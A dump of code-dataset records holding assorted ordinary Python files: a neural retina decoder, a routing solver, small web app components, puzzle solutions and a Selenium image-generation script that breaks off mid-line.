DecoderLoss sparsity penalty\n self.loss.decay()\n\n # for plotting\n train_costs.append(cost / n_batches)\n test_costs.append(test_cost)\n\n # plot cost and accuracy progression\n fig, axes = plt.subplots(1)\n axes.plot(train_costs, label='training')\n axes.plot(test_costs, label='validation')\n axes.set_xlabel('Epoch')\n axes.set_ylabel('Cost')\n plt.legend()\n plt.show()\n\n def train_step(self, inputs, targets):\n self.train() # set the model to training mode\n self.optimizer.zero_grad() # Reset gradient\n\n # Forward\n decoded = self.forward(inputs) # (N, C, T, H, W)\n output = self.loss.forward(\n # swap time to second dimension -> (N, T, C, H, W)\n decoded.transpose(1, 2), targets\n )\n\n # Backward\n output.backward() # compute gradients\n self.optimizer.step() # Update parameters\n\n return output.item() # cost\n\n def get_cost(self, inputs, targets):\n self.eval() # set the model to testing mode\n self.optimizer.zero_grad() # Reset gradient\n with torch.no_grad():\n # Forward\n decoded = self.forward(inputs) # (N, C, T, H, W)\n output = self.loss.forward(\n # swap time to second dimension -> (N, T, C, H, W)\n decoded.transpose(1, 2), targets\n )\n return output.item()\n\n def decode(self, sample_set):\n self.eval() # set the model to testing mode\n sample_loader = DataLoader(\n sample_set, batch_size=1, shuffle=True, num_workers=2\n )\n for i, sample in enumerate(sample_loader):\n with torch.no_grad():\n # get stimulus prediction from network activity\n net = sample['net'].to(self.dv)\n decoded = self.forward(net)\n del net\n\n # Reduce out batch and channel dims, then put time last\n # (N, C, T, H, W) -> (H, W, T)\n decoded = decoded.squeeze().cpu().numpy().transpose(1, 2, 0)\n net = sample['net'].squeeze().numpy().sum(axis=0)\n net = net.transpose(1, 2, 0)\n stim = sample['stim'].squeeze().numpy().transpose(1, 2, 0)\n\n # synced scrollable videos of cell actity, decoding, and stimulus\n fig, ax = plt.subplots(1, 3, figsize=(17, 6))\n net_stack = StackPlotter(ax[0], net, delta=1, vmin=0)\n deco_stack = StackPlotter(ax[1], decoded, delta=1, vmin=-1, vmax=1)\n stim_stack = StackPlotter(ax[2], stim, delta=1, vmin=-1, vmax=1)\n fig.canvas.mpl_connect('scroll_event', net_stack.onscroll)\n fig.canvas.mpl_connect('scroll_event', deco_stack.onscroll)\n fig.canvas.mpl_connect('scroll_event', stim_stack.onscroll)\n ax[0].set_title('Network Recording')\n ax[1].set_title('Decoding')\n ax[2].set_title('Stimulus')\n fig.tight_layout()\n plt.show()\n\n again = input(\n \"Show another reconstruction? 
Enter 'n' to quit\\n\")\n if again == 'n':\n break\n\n def save_decodings(self, sample_set):\n self.eval() # set the model to testing mode\n sample_loader = DataLoader(sample_set, batch_size=1, num_workers=2)\n\n # make a parent output folder for this dataset if it doesn't exist\n outfold = os.path.join(sample_set.root_dir, 'outputs')\n if not os.path.isdir(outfold):\n os.mkdir(outfold)\n # prompt for name of and create this particular runs output folder\n while True:\n nametag = input(\"Decoding set name: \")\n basefold = os.path.join(outfold, nametag)\n if not os.path.isdir(basefold):\n os.mkdir(basefold)\n break\n else:\n print('Folder exists, provide another name...')\n\n # generate decoding of every sample in given dataset\n for i, sample in enumerate(sample_loader):\n with torch.no_grad():\n # get stimulus prediction from network activity\n net = sample['net'].to(self.dv)\n decoded = self.forward(net)\n del sample, net\n\n # Reduce out batch and channel dims\n # (T, N, C, H, W) -> (T, H, W)\n decoded = decoded.squeeze().cpu().numpy()\n\n # save into subfolder corresponding to originating network\n decofold = os.path.join(\n basefold, sample_set.rec_frame.iloc[i, 0], # net folder name\n )\n if not os.path.isdir(decofold):\n os.mkdir(decofold)\n # .npy format\n np.save(\n # file name corresponding to stimulus\n os.path.join(decofold, sample_set.rec_frame.iloc[i, 1]),\n decoded\n )\n\n\ndef decoder_setup_1():\n \"\"\"\n Playing with spatial convs after transpose convolutions. Recent testing\n suggests this is the best setup so far. Revisit idea of interleaving\n spatial convolutions between transpose layers to achieve more cleanly\n defined shapes.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': True},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': True}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (1, 3, 3), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 16, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n {'in': 16, 'out': 8, 'kernel': (1, 3, 3), 'stride': 1},\n {'in': 8, 'out': 1, 'kernel': (1, 1, 1), 'stride': 1}\n ],\n )\n return decoder\n\n\ndef decoder_setup_2():\n \"\"\"\n This setup was the first big success, solid base config to work from.\n Note the lack of causal pooling, I hadn't built that module yet.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': False},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': False}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 
2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_3():\n \"Test lack of temporal downsampling.\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2)},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (1, 2, 2)}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_4():\n \"Token Conv RNN build.\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2)},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2)}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (2, 1, 1), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n {\n 'cell': crnns.ConvGRUCell_wnorm, 'dims': (25, 25),\n 'in_kernel': (3, 3), 'out_kernel': (3, 3), 'in': 15, 'out': 64,\n 'learn_initial': False, 'post_activation': nn.ReLU\n }\n ],\n # temporal convolution stack(s)\n [\n\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 64, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_5():\n \"\"\"\n This is the same as setup_2, which was the first breakthrough network,\n except here the pooling operations have been set to causal mode.\n On colab, 2x 20 epochs with lr=1e-1 and batch_sz=8 has produced strong\n strong decoding results.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': True},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': True}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (1, 3, 3), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef main():\n # train_path = 'D:/retina-sim-data/third/train_video_dataset/'\n # test_path = 'D:/retina-sim-data/third/test_video_dataset/'\n basepath = '/media/geoff/Data/retina-sim-data/third/'\n train_path = basepath + 'train_video_dataset/'\n test_path = basepath + 'test_video_dataset/'\n\n print('Building datasets...')\n # train_set = RetinaVideos(\n # train_path, preload=False, crop_centre=[100, 100], time_first=False,\n 
# frame_lag=0\n # )\n # test_set = RetinaVideos(\n # test_path, preload=False, crop_centre=[100, 100], time_first=False,\n # frame_lag=0\n # )\n train_set = RetinaVideos(\n basepath, 'train_video_dataset.h5', preload=False,\n crop_centre=[100, 100], time_first=False, frame_lag=0\n )\n test_set = RetinaVideos(\n basepath, 'test_video_dataset.h5', preload=False,\n crop_centre=[100, 100], time_first=False, frame_lag=0\n )\n\n print('Building model...')\n decoder = decoder_setup_5()\n\n if 'n' not in input(\"Load pre-trained state dict? (y/n):\"):\n while True:\n dict_path = input(\"Path to pickled RetinaDecoder state_dict:\")\n if not os.path.isfile(dict_path):\n print('Not a file, typo? Try again...')\n else:\n break\n decoder.load_state_dict(torch.load(dict_path))\n\n print('Fitting model...')\n decoder.fit(\n train_set, test_set, lr=1e-2, epochs=1, batch_sz=4, print_every=0,\n loss_alpha=10, loss_decay=.9, peons=2\n )\n\n print('Training set examples...')\n decoder.decode(train_set)\n print('Validation set examples...')\n decoder.decode(test_set)\n\n if 'n' not in input(\"Save trained decoder's state dict? (y/n):\"):\n path = input('Name for pickled model state:')\n torch.save(decoder.state_dict(), path)\n\n if 'n' not in input(\"Save training set decodings? (y/n):\"):\n decoder.save_decodings(train_set)\n if 'n' not in input(\"Save validation set decodings? (y/n):\"):\n decoder.save_decodings(test_set)\n\n\nif __name__ == '__main__':\n torch.backends.cudnn.benchmark = True\n\n main()\n","repo_name":"geoffder/retina-decoder","sub_path":"decoder_v4.py","file_name":"decoder_v4.py","file_ext":"py","file_size_in_byte":22521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"71401153826","text":"from datetime import datetime\nfrom hub.client.utils import get_user_name\nfrom typing import List, Optional\n\n\nclass CommitNode:\n \"\"\"Contains all the Version Control information about a particular commit.\"\"\"\n\n def __init__(self, branch: str, commit_id: Optional[str] = None):\n self.commit_id = commit_id\n self.branch = branch\n self.children: List[\"CommitNode\"] = []\n self.parent: Optional[\"CommitNode\"] = None\n self.commit_message: Optional[str] = None\n self.commit_time: Optional[datetime] = None\n self.commit_user_name: Optional[str] = None\n\n def add_child(self, node: \"CommitNode\"):\n \"\"\"Adds a child to the node, used for branching.\"\"\"\n node.parent = self\n self.children.append(node)\n\n def add_successor(self, node: \"CommitNode\", message: Optional[str] = None):\n \"\"\"Adds a successor (a type of child) to the node, used for commits.\"\"\"\n node.parent = self\n self.children.append(node)\n self.commit_message = message\n self.commit_user_name = get_user_name()\n self.commit_time = datetime.now()\n\n def __repr__(self) -> str:\n return f\"Commit : {self.commit_id} ({self.branch}) \\nAuthor : {self.commit_user_name}\\nTime : {str(self.commit_time)[:-7]}\\nMessage: {self.commit_message}\"\n\n __str__ = __repr__\n","repo_name":"gkr-bot/ci-cd-demo-repo","sub_path":"hub/core/version_control/commit_node.py","file_name":"commit_node.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72636891428","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\ndistance = [0]*100001\n\n\ndef bfs():\n q = deque()\n q.append(n)\n while q:\n a = q.popleft()\n if a == k:\n print(distance[a])\n break\n for case in (a-1, a+1, a*2):\n if 0 <= case <= 100000 and not distance[case]:\n distance[case] = distance[a]+1\n q.append(case)\n\n\nbfs()\n","repo_name":"jeonhl7579/jeonhl7579","sub_path":"bfs/BOJ1697.py","file_name":"BOJ1697.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29908010989","text":"import time\nx = int(input(\"Hvilket tall skal sjekkes?: \"))\nstart = time.time()\n\nA = [1,2,3,4,5,9,11,15,18,20,25,28,30,34,37,39,41,46,47,49,52,56,59,70]\ndef check(A, x):\n for i in A:\n if i==x:\n return True\n return False\n\nprint(A)\nres = check(A, x)\nprint(res)\nend = time.time()\nelapsed = end - start\nprint(\"\\nThe search took: \", elapsed)\nwhile res == False:\n x = int(input(\"Hvilket tall skal sjekkes?: \"))\n res = check(A, x)\n print(res)","repo_name":"jrundht/IN2010","sub_path":"Algorithms and datastructures/sok.py","file_name":"sok.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9674204821","text":"#!/usr/bin/env python\n# Robot Stop Button code: This contains code for the \"STOP\" button in the radar display\n#\n# Created By: Jeovanny Reyes\n# Created On: March 3, 2018\n#\n#\n# Raytheon Radar Guided Rescue robot\n# Cal State LA\n\nimport math\nimport time\nimport pygame\n\nfrom text_object_black import text_object_black\n\nSTOP_BUTTON_X_SCALE = 0.030\nis_mouse_over_button_bool = False\n\ndef stop_button(xpos,ypos,stop_val,brightred,red):\n mouse = pygame.mouse.get_pos() # Obtains position of mouse\n click = pygame.mouse.get_pressed()[0] # Obtains information when mouse gets clicked\n fontsize = int(xpos * STOP_BUTTON_X_SCALE)\n smalltext = pygame.font.Font(\"freesansbold.ttf\",30)\n x_pos = xpos * 0.050 # X Coordinate for button position\n y_pos = ypos * 0.035 # Y Coordinate for button position\n x_length = xpos * 0.150 # Length of \"STOP\" button\n y_width = ypos * 0.050 # Width of \"STOP\" button\n\n stop = stop_val # Initialy contains \"False\" boolean\n\n xposlength = x_pos + x_length\n yposwidth = y_pos + y_width\n\n # return xposlength, yposwidth, mouse, x_pos, y_pos, x_length, y_width\n is_mouse_over_button_bool = is_mouse_over_button(xposlength, x_pos, yposwidth, y_width)\n if is_mouse_over_button_bool: # Hovering over box\n pygame.draw.rect(pygame.display.get_surface(),brightred,(x_pos,y_pos,x_length,y_width))\n if click: # When we left click on the \"STOP\" button\n print('Robot has stopped moving!')\n stop = True # Value is then set to Stop\n\n else:\n pygame.draw.rect(pygame.display.get_surface(),red,(x_pos,y_pos,x_length,y_width))\n\n textSurf,textRect = text_object_black(\"STOP\",smalltext)\n textRect.center = ((x_pos +(x_length/2)), y_pos+(y_width/2))\n pygame.display.get_surface().blit(textSurf, textRect)\n return stop\n\ndef is_mouse_over_button(xposlength, x_pos, yposwidth, y_width):\n \"\"\"Detects if mouse is hovering over a button\"\"\"\n mouse = pygame.mouse.get_pos()\n return ((xposlength > mouse[0] > x_pos) and (yposwidth > mouse[1] > y_width))\n","repo_name":"jreyes81/rescuerobot","sub_path":"src/robot_stop.py","file_name":"robot_stop.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14095209216","text":"\"\"\"Simple Vehicles Routing Problem (VRP).\n\n This is a sample using the routing library python wrapper to solve a VRP\n problem.\n A description of the problem can be found here:\n http://en.wikipedia.org/wiki/Vehicle_routing_problem.\n\n Distances are in meters.\n\"\"\"\n\nTOTAL_VEHICLES = 1\nMAX_DISTANCE = 30000\nMULTIPLIER = 10\n\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nimport pickle\nimport sys\nimport datetime\nimport numpy as np\n\ndef create_data_model(matrix_file):\n \"\"\"Stores the data for the problem.\"\"\"\n\n data = {}\n # The matrix is divided by 10 for ease of calculation.\n # Multiplier is set to 10\n data['distance_matrix'] = (np.load(matrix_file)/MULTIPLIER).astype(int)\n data['num_vehicles'] = int(TOTAL_VEHICLES)\n data['depot'] = 0\n return data\n\n# Function added to save the routes as a list\ndef save_to_table(manager, routing, solution):\n \"\"\"Saves as a list.\"\"\"\n routes = []\n distances = []\n for vehicle_id in range(routing.vehicles()):\n route_distance = 0\n index = routing.Start(vehicle_id)\n route = [manager.IndexToNode(index)]\n while not routing.IsEnd(index):\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n route.append(manager.IndexToNode(index))\n routes.append(route)\n distances.append(route_distance)\n\n # Multiply the distances by 10 to get the actual distance\n distances = distances * MULTIPLIER\n return routes, distances\n\n\n# Function below is from Google OR-Tools VRP example\n\ndef print_solution(data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n print(f'Objective: {solution.ObjectiveValue()}')\n max_route_distance = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the route distances: {}m'.format(max_route_distance))\n\n\ndef main():\n \"\"\"Entry point of the program.\"\"\"\n\n filename = sys.argv[1]\n\n # Instantiate the data problem.\n data = create_data_model(filename)\n data['distance_matrix'] = data['distance_matrix'].tolist()\n\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n # Create and register a transit callback.\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Add Distance 
constraint.\n dimension_name = 'Distance'\n routing.AddDimension(\n transit_callback_index,\n 0, # no slack\n MAX_DISTANCE, # vehicle maximum travel distance\n True, # start cumul to zero\n dimension_name)\n distance_dimension = routing.GetDimensionOrDie(dimension_name)\n distance_dimension.SetGlobalSpanCostCoefficient(100)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n search_parameters.local_search_metaheuristic = (routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)\n search_parameters.log_search = True\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Get timestamp for output file\n current_datetime = datetime.datetime.now()\n timestamp_str = current_datetime.strftime('%Y%m%d_%H%M%S')\n\n # Print solution on console.\n if solution:\n print_solution(data, manager, routing, solution)\n route_list, distance_list = save_to_table(data, manager, routing, solution)\n print(route_list, distance_list)\n route_output = f\"data/generated_route_list/route_list_{timestamp_str}.pkl\"\n distance_output = f\"data/generated_distance_list/distance_list_{timestamp_str}.pkl\"\n with open(route_output, 'wb') as f:\n pickle.dump(route_list, f)\n with open(distance_output, 'wb') as f:\n pickle.dump(distance_list, f)\n else:\n print('No solution found !')\n\n\nif __name__ == '__main__':\n main()","repo_name":"uchicago-dsi/Perpetual","sub_path":"alternate_routing_methods/vrp.py","file_name":"vrp.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4311229830","text":"import cv2\n\n\nclass PostProcessor(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, classifier):\n \"\"\"\n\n Args:\n classifier:\n \"\"\"\n self.classifier = classifier\n\n @staticmethod\n def arg_max(array):\n \"\"\"\n\n Args:\n array:\n\n Returns:\n\n \"\"\"\n index = [[0]]\n for j, img in enumerate(array):\n max_value = img[0]\n for i, el in enumerate(img):\n print(el)\n if el > max_value:\n index = i\n max_value = el\n return index\n\n def __call__(self, image, rectangles, predictions):\n \"\"\"\n\n Args:\n image:\n rectangles:\n predictions:\n \"\"\"\n emotions = []\n img_emotions = []\n for i, img in enumerate(predictions):\n for j in range(0, self.classifier.get_num_class()):\n img_emotions.append((self.classifier.get_string(j), ' = ', f'{img[i][j]:.3f}'))\n emotions.append(img_emotions)\n self.overlay(image, rectangles, emotions)\n\n @staticmethod\n def overlay(frame, rectangles, text, color=(48, 12, 160)):\n \"\"\"\n Draw rectangles and text over image\n\n Args:\n frame (Mat): Image\n rectangles (list): Coordinates of rectangles to draw\n text (list): List of emotions to write\n color (tuple): Box and text color\n \"\"\"\n j = 1\n for i, rectangle in enumerate(rectangles):\n cv2.rectangle(frame, (rectangle.left(), rectangle.top()), (rectangle.right(), rectangle.bottom()), color)\n for mTuple in text[i]:\n cv2.putText(frame, \"\".join(mTuple), (rectangle.right() + 10, rectangle.top() + j * 12),\n cv2.FONT_HERSHEY_DUPLEX, 0.2, color)\n j += 1\n return frame\n","repo_name":"SomeUserName1/Emopy","sub_path":"src/util/PostProcessor.py","file_name":"PostProcessor.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"21894907102","text":"\"\"\"Advent of code 2020 day 15. Part 2 takes about 20 seconds\"\"\"\n\nimport time\n\nexamples = [[0, 3, 6], [1, 3, 2], [2, 1, 3], [1, 2, 3], [2, 3, 1], [3, 2, 1], [3, 1, 2]]\nactual = [2, 0, 1, 9, 5, 19]\n\n\ndef find_last_spoken(starting_numbers, turns):\n last_turn_spoken = {\n number: (position + 1) for position, number in enumerate(starting_numbers)\n }\n turn = len(starting_numbers)\n last_number_spoken = starting_numbers[-1]\n while turn < turns:\n if last_number_spoken in last_turn_spoken:\n diff = turn - last_turn_spoken[last_number_spoken]\n last_turn_spoken[last_number_spoken] = turn\n last_number_spoken = diff\n else:\n last_turn_spoken[last_number_spoken] = turn\n last_number_spoken = 0\n turn = turn + 1\n return last_number_spoken\n\n\nfor example in examples:\n start = time.time()\n print(find_last_spoken(example, 2020))\n end = time.time()\n print(end - start)\n\n\nstart = time.time()\nprint(find_last_spoken(actual, 2020))\nend = time.time()\nprint(end - start)\n\n\nfor example in examples:\n start = time.time()\n print(find_last_spoken(example, 30000000))\n end = time.time()\n print(end - start)\n\n\nstart = time.time()\nprint(find_last_spoken(actual, 30000000))\nend = time.time()\nprint(end - start)","repo_name":"harumpher/Advent-of-code-2020","sub_path":"day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74456471907","text":"from django import template\nfrom django.template.defaultfilters import urlencode\n\n\nclass FacebookShareLinkCreatorNode(template.Node):\n url = 'https://www.facebook.com/sharer/sharer.php?u=%s&t=%s'\n\n def __init__(self, link, title):\n self.link = link[1:-1]\n self.title = title[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.link),\n urlencode(self.title)\n )\n\n\nclass TwitterShareLinkCreatorNode(template.Node):\n url = 'https://twitter.com/share?text=%s&url=%s&hashtags=%s'\n\n def __init__(self, text, link, hashtags):\n self.text = text[1:-1]\n self.link = link[1:-1]\n self.hashtags = hashtags[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.text),\n urlencode(self.link),\n self.hashtags\n )\n\n\nclass TelegramShareLinkCreatorNode(template.Node):\n url = 'https://telegram.me/share/url?url=%s&text=%s'\n\n def __init__(self, text, link):\n self.text = text[1:-1]\n self.link = link[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.link),\n urlencode(self.text)\n )\n","repo_name":"roundium/django-handypackages","sub_path":"handypackages/utils/templatetags/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70776791268","text":"from aiohttp import web\nfrom app.service import insert_log, get_logs\n\nroutes = web.RouteTableDef()\n\n@routes.view('/logs/list/')\nclass LogListView(web.View):\n\n async def post(self):\n pool = self.request.app['db']\n params = await self.request.json()\n data = {\n 'logs': await get_logs(pool, params)\n }\n \n return web.json_response(data)\n\n@routes.view('/logs/add/')\nclass LogAddView(web.View):\n\n async def is_valid(self, data):\n user_id = data.get('user_id', None)\n type = data.get('type', None)\n action = data.get('action', None)\n try:\n is_user_valid = int(str(user_id))\n except ValueError:\n is_user_valid = False\n\n return is_user_valid and type and action\n\n\n async def post(self):\n data = await self.request.json()\n pool = self.request.app['db']\n\n if not await self.is_valid(data):\n return web.json_response({'error': 'not enough params'}, status=400)\n\n log = {\n 'user_id': data.get('user_id'),\n 'email': data.get('email', ''),\n 'type': data.get('type'),\n 'action': data.get('action'),\n 'url': data.get('url', ''),\n }\n\n await insert_log(pool, log)\n\n return web.json_response({'log': log})","repo_name":"EduScaled/unti-log-api","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"32057280709","text":"import pandas as pd, os, time, base64, pysftp\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom dotenv import load_dotenv\n\nprint(\"This script will open an excel spreadsheet in the local Downloads folder, pull out the experiment data, \\\n and create an image of the conversation in WhatsApp \\\n based on an interaction via https://www.fakewhats.com/generator with Selenium. The image will then \\\n be uploaded to https://ryanchausse.com/aubrie_masters/images/conversation_pics/, where x is \\\n a unique composite key, probably '- _
', or somesuch.\")\n\n# Assigning env variables for SFTP url, username, and password based on ENV variables\nload_dotenv(dotenv_path='.env')\nsftp_domain = os.environ.get('SFTP_DOMAIN')\nsftp_dir = str(os.environ.get('SFTP_DIR'))\nlocal_dir = str(os.environ.get('LOCAL_DIR'))\nssh_login_name = os.environ.get('SSH_LOGIN_NAME')\npassword = os.environ.get('PASSWORD')\n\n# Read experimental data, print to terminal\ndf = pd.read_excel('~/Downloads/experiment_data_revised.xlsx', sheet_name='Sheet1', header=0, usecols=\"A:K\", nrows=64)\nprint(df)\n\n# Create sftp connection with host.\n\n# 1. Create unique filename in the format '- _
'\n# 2. Gather image using https://www.fakewhats.com/generator from Intro, Response 1, and Response2 columns\n# 3. Upload image to sftp://ryanchausse.com/aubrie_masters/images/\n\nfor index, row in df.iterrows():\n # Selenium to scrape the page, enter input data\n driver = webdriver.Firefox()\n driver.get('https://www.fakewhats.com/generator')\n time.sleep(1)\n wait_for_loading_div_gone = WebDriverWait(driver, timeout=10).until(\n ec.invisibility_of_element_located(\n (By.XPATH, '//a[contains(@class,\"loader\")]')\n )\n )\n print('Past loader visibility check for ' + str(row['Intro']))\n\n # Enter message text\n message_propername_element = driver.find_element_by_id(\"name\")\n # message_propername_element.send_keys(str(row['Proper.Name1']))\n driver.execute_script(\"document.getElementById('name').value='\" + str(row['Proper.Name1']) + \"'\")\n message_propername_element.send_keys(Keys.RETURN)\n time.sleep(1)\n message_link_element = driver.find_element_by_xpath('//a[contains(@href,\"#panel4\")]')\n message_link_element.click()\n time.sleep(1)\n\n message_textarea_element = driver.find_element_by_id(\"message-text\")\n message_textarea_element.send_keys(str(row['Intro']))\n message_add_to_conversation_element = driver.find_element_by_css_selector(\".sendMessage\")\n message_add_to_conversation_element.click()\n time.sleep(1)\n if row['Response1']:\n message_textarea_element.clear()\n switch_speaker_button_element = driver.find_element_by_css_selector(\"label[for='green-message']\")\n switch_speaker_button_element.click()\n time.sleep(1)\n message_textarea_element.send_keys(str(row['Response1']))\n if row['Response2'] is not None and 